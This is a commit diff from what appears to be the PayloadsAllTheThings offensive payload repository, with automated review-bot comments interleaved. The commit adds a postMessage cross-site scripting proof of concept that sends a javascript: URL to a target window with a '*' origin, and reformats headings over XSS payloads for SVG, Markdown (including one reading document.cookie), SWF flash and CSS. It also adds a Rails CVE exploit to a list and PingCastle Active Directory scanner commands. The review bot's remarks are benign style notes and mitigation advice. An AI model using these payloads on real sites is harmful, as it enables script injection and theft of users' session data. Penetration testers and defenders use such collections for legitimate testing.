XSS PostMessage

Swissky 2019-08-03 23:22:14 +02:00
parent 9b96c7692f
commit bd449e9cea
3 changed files with 42 additions and 9 deletions

View File

@ -91,6 +91,10 @@
```powershell
pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD> --advanced-live --nullsession
pingcastle.exe --healthcheck --server domain.local
pingcastle.exe --graph --server domain.local
pingcastle.exe --scanner scanner_name --server domain.local
available scanners are:aclcheck,antivirus,corruptADDatabase,foreignusers,laps_bitlocker,localadmin,ullsession,nullsession-trust,share,smb,spooler,startup
```
* [Kerbrute](https://github.com/ropnop/kerbrute)
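Review bot: the scanner list on the `available scanners are:` line has `ullsession`, which looks like a typo for `nullsession` (the next entry is `nullsession-trust`), and it is missing a space after the colon. Since that line sits inside the `powershell` fence it reads as a fifth command; consider prefixing it with `#` so a reader does not paste it as one.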

View File

@ -34,7 +34,6 @@ You might also like the `Methodology and Resources` folder :
- [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)
- Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
- Apache Struts 2 CVE-2017-5638.py
- Apache Struts 2 CVE-2017-9805.py
- Apache Struts 2 CVE-2018-11776.py
- Docker API RCE.py
@ -43,6 +42,7 @@ You might also like the `Methodology and Resources` folder :
- JBoss CVE-2015-7501.py
- Jenkins CVE-2015-8103.py
- Jenkins CVE-2016-0792.py
- Rails CVE-2019-5420.rb
- Shellshock CVE-2014-6271.py
- Tomcat CVE-2017-12617.py
- WebLogic CVE-2016-3510.py

View File

@ -13,6 +13,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [XSS in HTML/Applications](#xss-in-htmlapplications)
- [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
- [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)
- [XSS in PostMessage](#xss-in-postmessage)
- [Blind XSS](#blind-xss)
- [XSS Hunter](#xss-hunter)
- [Other Blind XSS tools](#other-blind-xss-tools)
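Review bot: style: the Web API is spelled `postMessage` (lowercase p), while the new TOC entry (and the heading it points to) use `PostMessage`. The `#xss-in-postmessage` slug resolves either way, but matching the API's spelling keeps the entry consistent with the reference titles further down (`postMessage XSS on a million sites`).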
@ -262,7 +263,7 @@ vbscript:msgbox("XSS")
</name>
```
XSS in XML
### XSS in XML
```xml
<html>
@ -273,7 +274,7 @@ XSS in XML
</html>
```
XSS in SVG
### XSS in SVG
```xml
<?xml version="1.0" standalone="no"?>
@ -287,7 +288,7 @@ XSS in SVG
</svg>
```
XSS in SVG (short)
### XSS in SVG (short)
```javascript
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
@ -297,7 +298,7 @@ XSS in SVG (short)
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
```
XSS in Markdown
### XSS in Markdown
```csharp
[a](javascript:prompt(document.cookie))
@ -306,7 +307,7 @@ XSS in Markdown
[a](javascript:window.onerror=alert;throw%201)
```
XSS in SWF flash application
### XSS in SWF flash application
```powershell
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
@ -316,7 +317,7 @@ IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(invalidfileinvali
more payloads in ./files
XSS in SWF flash application
### XSS in SWF flash application
```
flashmediaelement.swf?jsinitfunctio%gn=alert`1`
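Review bot: after this change the file has two consecutive `### XSS in SWF flash application` headings (one above the `Browsers other than IE` block, one above this `flashmediaelement.swf` block). Rename the second, e.g. `### XSS in SWF flash application (other payloads)`, or merge the two blocks under one heading. The fence that opens this block also has no language tag, unlike every other block touched in this commit.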
@ -337,7 +338,7 @@ flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//
```
XSS in CSS
### XSS in CSS
```html
<!DOCTYPE html>
@ -356,6 +357,33 @@ div {
</html>
```
## XSS in PostMessage
> If the target origin is asterisk * the message can be sent to any domain has reference to the child page.
```html
<html>
<body>
<input type=button value="Click Me" id="btn">
</body>
<script>
document.getElementById('btn').onclick = function(e){
window.poc = window.open('http://www.redacted.com/#login');
setTimeout(function(){
window.poc.postMessage(
{
"sender": "accounts",
"url": "javascript:confirm('XSS')",
},
'*'
);
}, 2000);
}
</script>
</html>
```
## Blind XSS
### XSS Hunter
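Review bot: the section shows only the sending page, so a reader cannot tell what makes the receiver vulnerable. Add a sentence naming the listener pattern this PoC targets: a `message` handler that reads `event.data.url` and assigns it to `location` (or opens/writes it) without checking `event.origin`, which is why a `javascript:` URL ends up executing. The blockquote also needs a grammar fix, `any domain that has a reference to the child page`, and it conflates two separate issues: a `'*'` targetOrigin is the sender's problem (any window can receive the message), while the PoC exploits the receiver's missing origin check; stating both makes the section useful as a checklist. One mitigation line would round it off: validate `event.origin` against an allowlist and never pass message data into `location`, `eval`, or `innerHTML`.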
@ -1002,6 +1030,7 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
- [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf)](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g) by Marin MoulinierFollow
- [Airbnb When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) by Brett
- [XSSI, Client Side Brute Force](http://blog.intothesymmetry.com/2017/05/cross-origin-brute-forcing-of-saml-and.html)
- [postMessage XSS on a million sites - December 15, 2016 - Mathias Karlsson](https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/)
- [postMessage XSS Bypass](https://hackerone.com/reports/231053)
- [XSS in Uber via Cookie](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/) by zhchbin
- [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP](https://hackerone.com/reports/207042) by frans
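Review bot: the new postMessage references fit this list, but the context line just above them still reads `by Marin MoulinierFollow`; the trailing `Follow` is Medium's button text that was copied with the author's name and should be dropped while this block is being edited.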
@ -1014,4 +1043,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
- [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/)
- [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be)
- [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html)
- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)